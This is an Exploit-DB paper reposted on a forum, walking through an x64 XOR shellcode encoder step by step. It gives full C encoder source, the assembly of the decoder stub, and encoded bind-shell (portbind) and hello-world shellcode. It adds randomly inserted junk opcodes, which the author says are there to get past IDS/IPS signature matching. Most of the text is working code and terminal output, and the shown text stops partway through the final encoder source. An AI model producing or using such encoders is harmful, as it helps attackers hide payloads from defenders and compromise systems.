Exploit Simple x64 XOR Shellcode Obfuscation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
17775
Проверка EDB
  1. Пройдено
Автор
ENTROPY
Тип уязвимости
PAPERS
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2011-09-03
Код:
Part 2 of http://lucifer.phiral.net/x64_xor_encoder.txt

Download code at: http://lucifer.phiral.net/x64_bsd_encoder_2.tgz

Code is not optimized at all, only used as an example. This
only for shellcode less then 255 bytes, anything over
and you would have to change the loader - the old encoder does
this for you if you need and example.

The last encoder.c wrote the loader.s assembly file, using
1) the byte used to xor your shellcode and 2) the bytes that it
read from ./sc.bin. It assembled and linked loader.s, then
dumped the opcodes with a shell script - basically showing the
steps in a way that was easy to reproduce.
 
The loader.s template always looked like:

.section .data
.globl _start
_start:
    xorq %r8, %r8
    movb <BYTE XORING WITH>, %r9b <------- #1
    jmp get_sc_addr
jmp_back:
    popq %rax
    xorq %rcx, %rcx
    xorq %rbx, %rbx
xor_loop:
    movb (%rax, %rcx, 1), %bl
    cmpq %r8, %rbx
    je exec_sc
    xorb %r9b, %bl
    movb %bl, (%rax, %rcx, 1)
    incq %rcx
    jmp xor_loop
get_sc_addr:
    call jmp_back
exec_sc:
   .byte 0x<SC BYTE0>,0x<SC BYTE1>,0x<SC BYTE2>...
         ^
         | <------- #2

Which you can see by just running ./encoder from part 1 and cat'ing loader.s. 

Example:

[[email protected] ~/code/encoder/fids/old]$ wget http://lucifer.phiral.net/x64_bsd_encoder.tgz

100%[============================================================>] 3,002       --.-K/s   in 
0.04s   

2011-09-01 17:30:07 (81.6 KB/s) - `x64_bsd_encoder.tgz' saved [3002/3002]

[[email protected] ~/code/encoder/fids/old]$ tar -xvzf x64_bsd_encoder.tgz 
x encoder.c
x get-sc.sh
x portbind.s
x shell.s
x exec-sc.c
x hello_world.s
x sc.sh
[[email protected] ~/code/encoder/fids/old]$ gcc encoder.c -o encoder   

[[email protected] ~/code/encoder/fids/old]$ as portbind.s -o portbind.o

[[email protected] ~/code/encoder/fids/old]$ ld portbind.o -o portbind 

[[email protected] ~/code/encoder/fids/old]$ ./get-sc.sh portbind
"\x90\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\xcd\x80\x4d\x31\xc0\x41\x89\xc0\x4d\x31[...]

[[email protected] ~/code/encoder/fids/old]$ perl -e 'print "\x90\x6a\x61[...]";' > sc.bin

[[email protected] ~/code/encoder/fids/old]$ ./encoder 

shellcode length: 178

"\x4d\x31\xc0\x41\xb1\x03\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x93\x69\x62\x5b\x69\x01"
"\x5c\x69\x02\x5d\x69\x05\x59\xce\x83\x4e\x32\xc3\x42\x8a\xc3"
"\x4e\x32\xd1\x42\x51\x42\x51\x4b\x32\xca\xb2\x02\xc5\x07\x0f"
"\x01\xb2\x01\x65\xc4\x07\x0f\x19\x09\x69\x6b\x5b\x42\x53\x5c"
"\x4b\x8a\xe5\x69\x13\x59\xce\x83\x69\x69\x5b\x42\x53\x5c\x69"
"\x02\x5d\xce\x83\x69\x1d\x5b\x42\x53\x5c\x4b\x8a\xe5\x4b\x32"
"\xca\xb2\x13\x52\x4b\x8a\xe1\xce\x83\x5a\x4e\x32\xca\x42\x8a"
"\xc2\x69\x59\x5b\x47\x8a\xcc\x4b\x32\xf5\xce\x83\x69\x59\x5b"
"\x47\x8a\xcc\x69\x02\x5d\xce\x83\x69\x59\x5b\x47\x8a\xcc\x69"
"\x01\x5d\xce\x83\x69\x38\x5b\x4b\x32\xca\x52\x4b\x8a\xe5\x4b"
"\xba\x2c\x61\x6a\x6d\x2c\x70\x6b\xa9\x52\x4b\x8a\xe4\x4b\x32"
"\xd8\x4b\x32\xca\xb2\x04\x8b\x1f\x0f\x4b\x32\xd1\xce\x83\x69"
"\x02\x5b\x4b\x32\xfc\xce\x83"

[[email protected] ~/code/encoder/fids/old]$ cat loader.s
.section .data
.globl _start
_start:
    xorq %r8, %r8
    movb $3, %r9b        <------------ $3 is what this is xoring with
    jmp get_sc_addr
jmp_back:
    popq %rax
    xorq %rcx, %rcx
    xorq %rbx, %rbx
xor_loop:
    movb (%rax, %rcx, 1), %bl
    cmpq %r8, %rbx
    je exec_sc
    xorb %r9b, %bl
    movb %bl, (%rax, %rcx, 1)
    incq %rcx
    jmp xor_loop
get_sc_addr:
    call jmp_back
exec_sc:
   .byte 0x93,0x69,0x62,0x5b,0x69,0x01,0x5c,0x69,0x02,0x5d,0x69,0x05,0x59,0xce,0x83[...]
         ^
         ^ xored with $3 shellcode bytes

Since this was written to the .data section and not the .text (you have to change
from .text section as its readonly+execute). 

  1 .text         0000fcb0  0000000000400240  0000000000400240  00000240  2**6
                  CONTENTS, ALLOC, LOAD, READONLY, CODE

 15 .data         00000018  0000000000500af8  0000000000500af8  00000af8  2**3
                  CONTENTS, ALLOC, LOAD, DATA

Change .data section to .text and re-assemble and link so you can dump opcodes of 
the encoder easily.

[[email protected] ~/code/encoder/fids/old]$ cat loader.s | sed -e 's/.data/.text/g' > load.s

[[email protected] ~/code/encoder/fids/old]$ as -gstabs load.s -o load.o

[[email protected] ~/code/encoder/fids/old]$ ld load.o -o load

[[email protected] ~/code/encoder/fids/old]$ objdump -d load

[...]

00000000004000b0 <_start>:
  4000b0:	4d 31 c0             	xor    %r8,%r8
  4000b3:	41 b1 03             	mov    $0x3,%r9b
  4000b6:	eb 1a                	jmp    4000d2 <get_sc_addr>

00000000004000b8 <jmp_back>:
  4000b8:	58                   	pop    %rax
  4000b9:	48 31 c9             	xor    %rcx,%rcx
  4000bc:	48 31 db             	xor    %rbx,%rbx

00000000004000bf <xor_loop>:
  4000bf:	8a 1c 08             	mov    (%rax,%rcx,1),%bl
  4000c2:	4c 39 c3             	cmp    %r8,%rbx
  4000c5:	74 10                	je     4000d7 <exec_sc>
  4000c7:	44 30 cb             	xor    %r9b,%bl
  4000ca:	88 1c 08             	mov    %bl,(%rax,%rcx,1)
  4000cd:	48 ff c1             	inc    %rcx
  4000d0:	eb ed                	jmp    4000bf <xor_loop>

00000000004000d2 <get_sc_addr>:
  4000d2:	e8 e1 ff ff ff       	callq  4000b8 <jmp_back>

[...]

Everything from <exec_sc> down is the shellcode. So the decoder in C looks
like:

unsigned char decoder[] = 
"\x4d\x31\xc0"          /* xor    %r8,%r8               */
"\x41\xb1\x03"          /* mov    $0x3,%r9b             */
"\xeb\x1a"              /* jmp    4000d2 <get_sc_addr>  */
"\x58"                  /* pop    %rax                  */
"\x48\x31\xc9"          /* xor    %rcx,%rcx             */
"\x48\x31\xdb"          /* xor    %rbx,%rbx             */
"\x8a\x1c\x08"          /* mov    (%rax,%rcx,1),%bl     */
"\x4c\x39\xc3"          /* cmp    %r8,%rbx              */
"\x74\x10"              /* je     4000d7 <exec_sc>      */
"\x44\x30\xcb"          /* xor    %r9b,%bl              */
"\x88\x1c\x08"          /* mov    %bl,(%rax,%rcx,1)     */
"\x48\xff\xc1"          /* inc    %rcx                  */
"\xeb\xed"              /* jmp    4000bf <xor_loop>     */
"\xe8\xe1\xff\xff\xff"; /* callq  4000b8 <jmp_back>     */

Except in the old encoder.c I picked the first available good
byte I could xor everything with and not get a \x0, in this one
I make an array of all good bytes and randomly pick one. So the first
change is the line:

"\x41\xb1\x03"          /* mov    $0x3,%r9b             */

will change to

"\x41\xb1\x00"          /* mov    $0x00,%r9b             */

where 00 is some byte we can xor all the shellcode with. Thats the 5th
byte from the start of decoder, so overwrite that when we find a suitable
one. The new C code looks like:

[[email protected] ~/code/encoder/fids/fini/1/1]$ cat encoder.c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
 
unsigned char decoder[] =
 "\x4d\x31\xc0"          /* xor    %r8,%r8               */
 "\x41\xb1\x00"          /* mov    $0x00,%r9b            */
 "\xeb\x1a"              /* jmp    4000d2 <get_sc_addr>  */
 "\x58"                  /* pop    %rax                  */
 "\x48\x31\xc9"          /* xor    %rcx,%rcx             */
 "\x48\x31\xdb"          /* xor    %rbx,%rbx             */
 "\x8a\x1c\x08"          /* mov    (%rax,%rcx,1),%bl     */
 "\x4c\x39\xc3"          /* cmp    %r8,%rbx              */
 "\x74\x10"              /* je     4000d7 <exec_sc>      */
 "\x44\x30\xcb"          /* xor    %r9b,%bl              */
 "\x88\x1c\x08"          /* mov    %bl,(%rax,%rcx,1)     */
 "\x48\xff\xc1"          /* inc    %rcx                  */
 "\xeb\xed"              /* jmp    4000bf <xor_loop>     */
 "\xe8\xe1\xff\xff\xff"; /* callq  4000b8 <jmp_back>     */

int 
main(int argc, char **argv) {

    struct stat sstat;
    int i, n, fd, len, xor_with;
    int dlen;
    unsigned char *fbuf, *ebuf;
    unsigned char bad_bytes[256] = {0};
    unsigned char good_bytes[256] = {0};

    /* open the sc.bin file and read all the bytes */
    if (lstat("sc.bin", &sstat) < 0) {
        _exit(-1);
    }

    len = sstat.st_size;
    if ((fbuf = (unsigned char *)malloc(len)) == NULL) {
        perror("malloc");
        _exit(-1);
    }
    
    if ((fd = open("sc.bin", O_RDONLY)) < 0) {
        perror("open");
        _exit(-1);
    }

    if (read(fd, fbuf, len) != len) {
        perror("read");
        _exit(-1);
    }

    close(fd);

    /* try every byte xored, if its \x0 add to bad_bytes */
    for (n = 0; n < len; n++) {
        for (i = 1; i < 256; i++) {
             if ((i^*(fbuf+n)) == 0) bad_bytes[i] = i;
        }
    }  

    /* if its not a bad_byte its a good_one (ordered) */
    for (i = 1, n = 0; i < 256; i++) {
        if (bad_bytes[i] == '\0') good_bytes[n++] = i;
    }
    
    srand((unsigned)time(NULL));  
    xor_with = good_bytes[rand()%n];

    if (xor_with) {
        printf("\n[x] Choose to XOR with 0x%02x\n\n", xor_with);
        srand((unsigned)time(NULL));
        xor_with = good_bytes[rand()%n];

        /* overwrite that 5th xor byte with the xor_with byte */
        decoder[5] = xor_with;
        dlen = strlen((char *)decoder);

        if ((ebuf = (unsigned char *)malloc(dlen+len+1)) == NULL) {
            perror("malloc");
            _exit(-1);
        }
        memset(ebuf, '\x0', sizeof(ebuf));

        /* copy the en/decoder into the array */
        for (i = 0; i < dlen; i++) {
            ebuf[i] = decoder[i]; 
        }

        /* copy the xored shellcode byes in */
        for (i = 0; i < len; i++) {
            ebuf[(i+dlen)] = xor_with^*(fbuf+i);
        }

        printf("\n\"");
        for (i = 0; i < strlen((char *)ebuf); i++) {
            if (i > 0 && i % 15 == 0) printf("\"\n\""); 
            printf("\\x%02x", ebuf[i]);
        }
        printf("\";\n\n");

        return 0;
    } else {
        printf("\n[*] No byte found to XOR with :(\n");
        _exit(-1);
    }

    return 0;
}

[[email protected] ~/code/encoder/fids/fini/1/1]$ gcc -Wall encoder.c -o encoder
[[email protected] ~/code/encoder/fids/fini/1/1]$ as hello_world.s -o hello_world.o
[[email protected] ~/code/encoder/fids/fini/1/1]$ ld hello_world.o -o hello_world
[[email protected] ~/code/encoder/fids/fini/1/1]$ ./write-sc.sh

Usage: ./write-sc.sh <bin>

Dumps opcodes from assembled and linked bin,
then perl -e 'print <OPCODES>;' to sc.bin.

Example: 
as code.s -o code.o
ld code.o -o code
./write-sc.sh code

[[email protected] ~/code/encoder/fids/fini/1/1]$ ./write-sc.sh hello_world

Now everytime its run it will pseudo randomly pick the byte to xor with
out of the array of good_bytes.

[[email protected] ~/code/encoder/fids/fini/1/1]$ ./encoder 

[x] Choose to XOR with 0xfd

"\x4d\x31\xc0\x41\xb1\xfd\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x6d\x97\xf9\xa5\x97\xfc"
"\xa2\xb5\x44\x92\x8f\x91\x99\xdc\xf7\x57\x57\xac\xb5\x44\xb5"
"\x98\x91\x91\x92\xd1\xdd\xaa\xac\xb5\xcc\x26\xb5\xcc\x34\x44"
"\xf3\xfd\xfd\xfd\x9b\x74\xe1\xf1\xb5\x74\x1b\x97\xf3\xa7\x30"
"\x7d\xa4\xa4\x97\xfc\xa5\x97\xfd\xa2\x30\x7d";

[[email protected] ~/code/encoder/fids/fini/1/1]$ ./encoder 

[x] Choose to XOR with 0xb7

"\x4d\x31\xc0\x41\xb1\xb7\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x27\xdd\xb3\xef\xdd\xb6"
"\xe8\xff\x0e\xd8\xc5\xdb\xd3\x96\xbd\x1d\x1d\xe6\xff\x0e\xff"
"\xd2\xdb\xdb\xd8\x9b\x97\xe0\xe6\xff\x86\x6c\xff\x86\x7e\x0e"
"\xb9\xb7\xb7\xb7\xd1\x3e\xab\xbb\xff\x3e\x51\xdd\xb9\xed\x7a"
"\x37\xee\xee\xdd\xb6\xef\xdd\xb7\xe8\x7a\x37";

[[email protected] ~/code/encoder/fids/fini/1/1]$ ./encoder 

[x] Choose to XOR with 0xeb

"\x4d\x31\xc0\x41\xb1\xeb\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x7b\x81\xef\xb3\x81\xea"
"\xb4\xa3\x52\x84\x99\x87\x8f\xca\xe1\x41\x41\xba\xa3\x52\xa3"
"\x8e\x87\x87\x84\xc7\xcb\xbc\xba\xa3\xda\x30\xa3\xda\x22\x52"
"\xe5\xeb\xeb\xeb\x8d\x62\xf7\xe7\xa3\x62\x0d\x81\xe5\xb1\x26"
"\x6b\xb2\xb2\x81\xea\xb3\x81\xeb\xb4\x26\x6b";

But the problem is the decoder code is always the same,
so any ids/ips/hids etc will be able to pick it up with their leet 
string matching 100k dollar skillz. A solution is to put some random
useless shit opcodes before and in between the decoder. Obviously
this will make the shellcode larger.

I dont use any registers above %r9 in code so make up a useless.s
with a bunch of useless asm, assemble and link it and dump opcodes.

[[email protected] ~/code/encoder/fids]$ cat useless.s
.section .text
.globl _start
_start:
    nop
    xor %r10, %r10
    xor %r11, %r11
    xor %r12, %r12
    xor %r13, %r13  
    xor %r14, %r14
    xor %r15, %r15
    shr $8, %r10
    shl $8, %r10
    shr $8, %r11
    shl $8, %r11
    shr $8, %r12
    shl $8, %r12
    shr $8, %r13
    shl $8, %r13
    shr $8, %r14
    shl $8, %r14
    shr $8, %r15
    shl $8, %r15
    incq %r10
    decq %r10
    incq %r11
    decq %r11
    incq %r12
    decq %r12
    incq %r13
    decq %r13
    incq %r14
    decq %r14
    incq %r15
    decq %r15

Obvioulsy theres a fuck load of others that would work also but...

[[email protected] ~/code/encoder/fids]$ as useless.s -o useless.o
[[email protected] ~/code/encoder/fids]$ ld useless.o -o useless

[[email protected] ~/code/encoder/fids]$ objdump -d ./useless | grep -v 'file' |cut -d: -f2|cut 
-f1-7 -d' '|tr -s ' '| tr '\t' ' '|sed 's/ $//g' | sed -e '/^$/d'
 90
 4d 31 d2
 4d 31 db
 4d 31 e4
 4d 31 ed
 4d 31 f6
 4d 31 ff
 49 c1 ea 08
 49 c1 e2 08
 49 c1 eb 08
 49 c1 e3 08
 49 c1 ec 08
 49 c1 e4 08
 49 c1 ed 08
 49 c1 e5 08
 49 c1 ee 08
 49 c1 e6 08
 49 c1 ef 08
 49 c1 e7 08
 49 ff c2
 49 ff ca
 49 ff c3
 49 ff cb
 49 ff c4
 49 ff cc
 49 ff c5
 49 ff cd
 49 ff c6
 49 ff ce
 49 ff c7
 49 ff cf

And in C:

[[email protected] ~/code/encoder/fids]$ objdump -d ./useless | grep -v 'file' |cut -d: -f2|cut 
-f1-7 -d' '|tr -s ' '| tr '\t' ' '|sed 's/ $//g' | sed -e '/^$/d' | wc
      31     103     340

31 lines of...

unsigned char useless[][5] = {
 {"\x90"},              /* nop              */
 {"\x4d\x31\xd2"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xdb"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xe4"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xed"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xf6"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xff"},      /* xor    %r10,%r10 */
 {"\x49\xc1\xea\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe2\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xeb\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe3\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xec\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe4\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xed\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe5\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xee\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe6\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xef\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe7\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xff\xc2"},      /* inc    %r10      */
 {"\x49\xff\xca"},      /* dec    %r10      */
 {"\x49\xff\xc3"},      /* inc    %r10      */
 {"\x49\xff\xcb"},      /* dec    %r10      */
 {"\x49\xff\xc4"},      /* inc    %r10      */
 {"\x49\xff\xcc"},      /* dec    %r10      */
 {"\x49\xff\xc5"},      /* inc    %r10      */
 {"\x49\xff\xcd"},      /* dec    %r10      */
 {"\x49\xff\xc6"},      /* inc    %r10      */
 {"\x49\xff\xce"},      /* dec    %r10      */ 
 {"\x49\xff\xc7"},      /* inc    %r10      */
 {"\x49\xff\xcf"}};     /* dec    %r10      */

The new encoder.c looks like:

[[email protected] ~/code/encoder/fids/fini/1/2]$ cat encoder.c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
 
unsigned char decoder[] =
 "\x4d\x31\xc0"          /* xor    %r8,%r8               */
 "\x41\xb1\x00"          /* mov    $0x00,%r9b            */
 "\xeb\x1a"              /* jmp    4000d2 <get_sc_addr>  */
 "\x58"                  /* pop    %rax                  */
 "\x48\x31\xc9"          /* xor    %rcx,%rcx             */
 "\x48\x31\xdb"          /* xor    %rbx,%rbx             */
 "\x8a\x1c\x08"          /* mov    (%rax,%rcx,1),%bl     */
 "\x4c\x39\xc3"          /* cmp    %r8,%rbx              */
 "\x74\x10"              /* je     4000d7 <exec_sc>      */
 "\x44\x30\xcb"          /* xor    %r9b,%bl              */
 "\x88\x1c\x08"          /* mov    %bl,(%rax,%rcx,1)     */
 "\x48\xff\xc1"          /* inc    %rcx                  */
 "\xeb\xed"              /* jmp    4000bf <xor_loop>     */
 "\xe8\xe1\xff\xff\xff"; /* callq  4000b8 <jmp_back>     */

unsigned char useless[][5] = {
 {"\x90"},              /* nop              */
 {"\x4d\x31\xd2"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xdb"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xe4"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xed"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xf6"},      /* xor    %r10,%r10 */
 {"\x4d\x31\xff"},      /* xor    %r10,%r10 */
 {"\x49\xc1\xea\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe2\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xeb\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe3\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xec\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe4\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xed\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe5\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xee\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe6\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xc1\xef\x08"},  /* shr    $0x8,%r10 */
 {"\x49\xc1\xe7\x08"},  /* shl    $0x8,%r10 */
 {"\x49\xff\xc2"},      /* inc    %r10      */
 {"\x49\xff\xca"},      /* dec    %r10      */
 {"\x49\xff\xc3"},      /* inc    %r10      */
 {"\x49\xff\xcb"},      /* dec    %r10      */
 {"\x49\xff\xc4"},      /* inc    %r10      */
 {"\x49\xff\xcc"},      /* dec    %r10      */
 {"\x49\xff\xc5"},      /* inc    %r10      */
 {"\x49\xff\xcd"},      /* dec    %r10      */
 {"\x49\xff\xc6"},      /* inc    %r10      */
 {"\x49\xff\xce"},      /* dec    %r10      */ 
 {"\x49\xff\xc7"},      /* inc    %r10      */
 {"\x49\xff\xcf"}};     /* dec    %r10      */

int 
main(int argc, char **argv) {

    struct stat sstat;
    int i, n, fd, len, xor_with;
    int dlen, plen;
    unsigned char *fbuf, *ebuf;
    unsigned char bad_bytes[256] = {0};
    unsigned char good_bytes[256] = {0};

    /* open the sc.bin file and read all the bytes */
    if (lstat("sc.bin", &sstat) < 0) {
        _exit(-1);
    }

    len = sstat.st_size;
    if ((fbuf = (unsigned char *)malloc(len)) == NULL) {
        perror("malloc");
        _exit(-1);
    }
    
    if ((fd = open("sc.bin", O_RDONLY)) < 0) {
        perror("open");
        _exit(-1);
    }

    if (read(fd, fbuf, len) != len) {
        perror("read");
        _exit(-1);
    }

    close(fd);

    /* try every byte xored, if its \x0 add to bad_bytes */
    for (n = 0; n < len; n++) {
        for (i = 1; i < 256; i++) {
             if ((i^*(fbuf+n)) == 0) bad_bytes[i] = i;
        }
    }  

    /* if its not a bad_byte its a good_one (ordered) */
    for (i = 1, n = 0; i < 256; i++) {
        if (bad_bytes[i] == '\0') good_bytes[n++] = i;
    }
    
    srand((unsigned)time(NULL));  
    xor_with = good_bytes[rand()%n];

    if (xor_with) {
        printf("\n[x] Choose to XOR with 0x%02x\n\n", xor_with);
        srand((unsigned)time(NULL));
        xor_with = good_bytes[rand()%n];

        /* overwrite that 5th xor byte with the xor_with byte */
        decoder[5] = xor_with;
        dlen = strlen((char *)decoder);

        /* prepend: longest useless[] instruction were using is four bytes
         * randomly prepend between one and four useless instructions so
         * sixteen bytes at maximim. 
         */
        if ((ebuf = (unsigned char *)malloc(16+dlen+len+1)) == NULL) {
            perror("malloc");
            _exit(-1);
        }
        memset(ebuf, '\x0', sizeof(ebuf));

        /* randomly prepend between one and four instructions */
        /* thirty one lines of useless[] instructions in 2d array */
        n = rand()%(4 + 1);
        for (i = 0, plen = 0; i < n; i++) {
            int k, opcode = rand()%31;
            printf("[p] Prepending useless opcodes: ");
            for (k = 0; k < strlen((char *)useless[opcode]); k++) {
                printf("\\x%02x", useless[opcode][k]);
            }
            printf("\n");
            memcpy(ebuf+plen, useless[opcode], strlen((char *)useless[opcode]));
            plen += strlen((char *)useless[opcode]);
        }
        printf("\n");

        for (i = 0; i < dlen; i++) {
             ebuf[(i+plen)] = decoder[i];             
        } 

        /* copy the xored shellcode byes in */
        for (i = 0; i < len; i++) {
            ebuf[(i+dlen+plen)] = xor_with^*(fbuf+i);
        }

        printf("\n\"");
        for (i = 0; i < strlen((char *)ebuf); i++) {
            if (i > 0 && i % 15 == 0) printf("\"\n\""); 
            printf("\\x%02x", ebuf[i]);
        }
        printf("\";\n\n");

        return 0;
    } else {
        printf("\n[*] No byte found to XOR with :(\n");
        _exit(-1);
    }

    return 0;
}

[[email protected] ~/code/encoder/fids/fini/1/2]$ gcc -Wall encoder.c -o encoder

[[email protected] ~/code/encoder/fids/fini/1/2]$ as hello_world.s -o hello_world.o 
[[email protected] ~/code/encoder/fids/fini/1/2]$ ld hello_world.o -o hello_world 
[[email protected] ~/code/encoder/fids/fini/1/2]$ ./write-sc.sh hello_world
[[email protected] ~/code/encoder/fids/fini/1/2]$ ./encoder 

[x] Choose to XOR with 0x1f

[p] Prepending useless opcodes: \x49\xff\xc4
[p] Prepending useless opcodes: \x49\xc1\xe5\x08
[p] Prepending useless opcodes: \x49\xff\xc7


"\x49\xff\xc4\x49\xc1\xe5\x08\x49\xff\xc7\x4d\x31\xc0\x41\xb1"
"\x1f\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x08\x4c\x39"
"\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48\xff\xc1\xeb\xed\xe8"
"\xe1\xff\xff\xff\x8f\x75\x1b\x47\x75\x1e\x40\x57\xa6\x70\x6d"
"\x73\x7b\x3e\x15\xb5\xb5\x4e\x57\xa6\x57\x7a\x73\x73\x70\x33"
"\x3f\x48\x4e\x57\x2e\xc4\x57\x2e\xd6\xa6\x11\x1f\x1f\x1f\x79"
"\x96\x03\x13\x57\x96\xf9\x75\x11\x45\xd2\x9f\x46\x46\x75\x1e"
"\x47\x75\x1f\x40\xd2\x9f";

[[email protected] ~/code/encoder/fids/fini/1/2]$ ./encoder 

[x] Choose to XOR with 0x8f

[p] Prepending useless opcodes: \x4d\x31\xf6


"\x4d\x31\xf6\x4d\x31\xc0\x41\xb1\x8f\xeb\x1a\x58\x48\x31\xc9"
"\x48\x31\xdb\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88"
"\x1c\x08\x48\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x1f\xe5\x8b"
"\xd7\xe5\x8e\xd0\xc7\x36\xe0\xfd\xe3\xeb\xae\x85\x25\x25\xde"
"\xc7\x36\xc7\xea\xe3\xe3\xe0\xa3\xaf\xd8\xde\xc7\xbe\x54\xc7"
"\xbe\x46\x36\x81\x8f\x8f\x8f\xe9\x06\x93\x83\xc7\x06\x69\xe5"
"\x81\xd5\x42\x0f\xd6\xd6\xe5\x8e\xd7\xe5\x8f\xd0\x42\x0f";

[[email protected] ~/code/encoder/fids/fini/1/2]$ ./encoder 

[x] Choose to XOR with 0xc8

[p] Prepending useless opcodes: \x49\xc1\xee\x08
[p] Prepending useless opcodes: \x49\xff\xcd
[p] Prepending useless opcodes: \x49\xc1\xea\x08


"\x49\xc1\xee\x08\x49\xff\xcd\x49\xc1\xea\x08\x4d\x31\xc0\x41"
"\xb1\xc8\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x08\x4c"
"\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48\xff\xc1\xeb\xed"
"\xe8\xe1\xff\xff\xff\x58\xa2\xcc\x90\xa2\xc9\x97\x80\x71\xa7"
"\xba\xa4\xac\xe9\xc2\x62\x62\x99\x80\x71\x80\xad\xa4\xa4\xa7"
"\xe4\xe8\x9f\x99\x80\xf9\x13\x80\xf9\x01\x71\xc6\xc8\xc8\xc8"
"\xae\x41\xd4\xc4\x80\x41\x2e\xa2\xc6\x92\x05\x48\x91\x91\xa2"
"\xc9\x90\xa2\xc8\x97\x05\x48";

etc.

Now to insert useless opcodes between the decoder. The instructions
chosen will not effect anything in this, so after each instruction 
up until the jmp it is possible to insert any of them. Obviously you cant
insert any after the jmp as it would fuck up the relative offset, but 
if your willing to fix the jmp offsets its possible.

    "\x4d\x31\xc0"          /* xor    %r8,%r8               */ index 2
    "\x41\xb1\x00"          /* mov    $0x00,%r9b            */ index 5
    "\xeb\x1a"              /* jmp    4000d2 <get_sc_addr>  */ 
    "\x58"                  /* pop    %rax                  */ 
    "\x48\x31\xc9"          /* xor    %rcx,%rcx             */ 
    "\x48\x31\xdb"          /* xor    %rbx,%rbx             */ 
    "\x8a\x1c\x08"          /* mov    (%rax,%rcx,1),%bl     */ 
    "\x4c\x39\xc3"          /* cmp    %r8,%rbx              */ 
    "\x74\x10"              /* je     4000d7 <exec_sc>      */ 
    "\x44\x30\xcb"          /* xor    %r9b,%bl              */ 
    "\x88\x1c\x08"          /* mov    %bl,(%rax,%rcx,1)     */ 
    "\x48\xff\xc1"          /* inc    %rcx                  */ 
    "\xeb\xed"              /* jmp    4000bf <xor_loop>     */ 
    "\xe8\xe1\xff\xff\xff"; /* callq  4000b8 <jmp_back>     */ 

The code to then put random instructions at index 2 and index 5 of the 
decoder is:

[[email protected] ~/code/encoder/fids/fini/1]$ cat encoder.c 
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>

/*
 * 
 * im completely rehabilitated, reinvigorated, 
 * reassimilated and relocated psych 
 *
 */
 
unsigned char decoder[] =
 "\x4d\x31\xc0"          /* xor    %r8,%r8               */
 "\x41\xb1\x00"          /* mov    $0x00,%r9b            */
 "\xeb\x1a"              /* jmp    4000d2 <get_sc_addr>  */
 "\x58"                  /* pop    %rax                  */
 "\x48\x31\xc9"          /* xor    %rcx,%rcx             */
 "\x48\x31\xdb"          /* xor    %rbx,%rbx             */
 "\x8a\x1c\x08"          /* mov    (%rax,%rcx,1),%bl     */
 "\x4c\x39\xc3"          /* cmp    %r8,%rbx              */
 "\x74\x10"              /* je     4000d7 <exec_sc>      */
 "\x44\x30\xcb"          /* xor    %r9b,%bl              */
 "\x88\x1c\x08"          /* mov    %bl,(%rax,%rcx,1)     */
 "\x48\xff\xc1"          /* inc    %rcx                  */
 "\xeb\xed"              /* jmp    4000bf <xor_loop>     */
